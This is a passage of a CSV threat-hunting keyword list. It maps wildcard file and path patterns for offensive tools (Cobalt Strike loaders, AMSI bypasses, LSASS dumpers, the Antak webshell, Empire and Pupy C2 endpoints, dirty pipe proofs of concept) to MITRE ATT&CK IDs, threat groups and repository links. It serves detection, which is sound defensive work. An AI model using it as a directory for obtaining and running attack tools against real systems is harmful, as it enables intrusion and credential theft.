T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*/ahmedkhlief/Ninja/*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*/ahrixia/CVE_2022_0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ahrixia/CVE_2022_0847","1","1","N/A","N/A","1","21","15","2022-03-08T13:15:35Z","2022-03-08T12:43:43Z" +"*/ajp-auth.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ajp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ajp-headers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ajp-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ajp-request.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/alan.log*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*/Alan.v*.zip*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*/Alaris.sln*","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - 
TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","846","136","2021-11-01T05:00:43Z","2020-02-22T15:42:37Z" +"*/Alcatraz.exe*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" +"*/Alcatraz.git*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" +"*/Alcatraz/files/*/Alcatraz.zip*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" +"*/Alcatraz/x64*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" +"*/Alcatraz-gui*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" +"*/all/pupyutils/*.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/All_attack.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*/allseeingeye-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/amass/wordlists*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/amqp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/amsi.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Amsi_Bypass_In_2023*","offensive_tool_keyword","Amsi_Bypass","Amsi Bypass payload that works on Windwos 11","T1055 - T1055.012 - T1562 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/senzee1984/Amsi_Bypass_In_2023","1","1","N/A","8","3","275","48","2023-07-30T19:17:23Z","2023-07-30T16:14:19Z" +"*/AMSI_patch.git*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" +"*/Amsi-Killer.git*","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","10","5","493","77","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" +"*/AmsiOpenSession.exe*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" +"*/Analyzer-Session.log*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*/AndrewSpecial.git*","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","10","4","370","101","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z" +"*/android/pupydroid/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/ANGRYPUPPY.cna*","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","10","10","300","93","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" +"*/antak.aspx*","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*/anthemtotheego/CredBandit*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","218","25","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" +"*/AntiSandbox.go*","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","10","10","0","2","2023-09-11T10:20:41Z","2023-08-31T09:36:38Z" +"*/AntiSandbox.go*","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","10","10","5","2","2023-08-31T12:06:58Z","2023-08-13T11:04:20Z" +"*/antx-code/CVE-2022-0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/antx-code/CVE-2022-0847","1","1","N/A","N/A","1","60","21","2022-03-08T09:14:25Z","2022-03-08T09:10:51Z" +"*/AoratosWin/*","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" +"*/APCLdr.*","offensive_tool_keyword","APCLdr","APCLdr: Payload Loader With Evasion Features","T1027 - T1055 - T1055.002 - T1055.003 - T1070 - T1070.004 - T1071 - T1106 - T1574.001","TA0005 - TA0006 - 
TA0008","N/A","N/A","Defense Evasion","https://github.com/NUL0x4C/APCLdr","1","1","N/A","N/A","3","285","51","2023-01-22T04:24:33Z","2023-01-21T18:09:36Z" +"*/api/admin/shutdown?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/api/agents/*/kill?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - 
T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/api/agents/all/kill?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/api/agents/all/shell?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/api/agents/CXPLDTZCKFNT3SLT/shell?*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 
- T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/api/agents/stale?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/api/agents/XMY2H2ZPFWNPGEAP?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/api/listeners/all?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - 
T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/api/modules/collection/*?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - 